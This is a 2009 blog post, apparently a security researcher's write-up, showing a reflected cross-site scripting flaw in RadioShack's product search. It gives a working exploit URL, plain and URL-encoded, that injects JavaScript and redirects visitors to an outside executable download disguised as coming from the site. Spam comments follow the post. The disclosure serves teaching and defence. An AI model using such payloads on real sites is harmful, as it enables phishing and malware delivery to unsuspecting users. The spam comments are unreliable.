This site is soon to be deprecated by http://www.johnleitch.net

Tuesday, May 5, 2009

Insecure JavaScript - RadioShack.com

Today we're going to examine www.radioshack.com. As with many XSS exploits, this will be short and simple. Looking at the site you'll notice that they have a product search. Just as before we'll test this using our special string, testA.,:;\'"<>()[]{}



Without viewing the source it's apparent that our test string has been significantly altered. ,:;\'"<>()[]{} has been completely removed from our search, but how much of this happened client-side? Lets take a look at the current URL.
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testa.&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=


By changing the kw field to our original search string we can create our own URL and see how reliant on client-side validation the site is. Our new URL should look like this:
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testA.,:;\'"<>()[]{}&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=




Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. Looking at the first match for testA it's apparent that our search string is encoded.


<input type="text" style="font-size:10px;width:164px;" name="kw" id="kw" value="testA.,:;\'&quot;&lt;&gt;()[]{}">

This complicates things, but an attack is still possible. Lets look at some of the other results. Near the bottom of the page is the following block of javascript:

var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='testA.,:;\'&quot;&lt;&gt;()[]{}';
var s_pageName='Search (internal)';

Because we have access to the single quote character, we can easily inject code here. Consider what would happen if we passed in ';var x=' as the keyword.

var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='';var x='';
var s_pageName='Search (internal)';

At this point we can write any javascript we want between the ; and v provided we don't use any of the encoded characters. As an example of what can be done with this, we can craft a URL that redirects to a download making it seem as is if it's coming from www.radioshack.com.
http://www.radioshack.com/search/noResults.jsp?kw=';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='




And again we can URL encode the payload.

http://www.radioshack.com/search/noResults.jsp?kw=%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27

5 comments:

  1. A searchable online catalog of the popular electronics store, Radio Shack. Consumers can purchase everything from computers to digital photo frames or gift cards. Products are divided into ten categories, each having several subcategories.

    norton promo bike shop melbourne

    ReplyDelete
  2. Secure Bytes business philosophy is to provide a single console from where organization can cater their security concerns and resolve Information Security issues proactively. We are result oriented rather than task oriented with focus on cost minimization and productivity which we attain through preserving our human assets, comprehensive and innovative solutions.

    it security
    increase youtube views

    ReplyDelete
  3. Good article.I really think what you said is right,in modern society,we have so many troubles,if you feel nothing to relax yourself,I suggest you to play the wow and some other games,and you can come to my page to find more information about http://www.mmolive.com/ and http://www.mmohome.com/gold/Guild-Wars-2-US.html/

    ReplyDelete
  4. buy diablo 3 goldThings certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. It is useful~

    ReplyDelete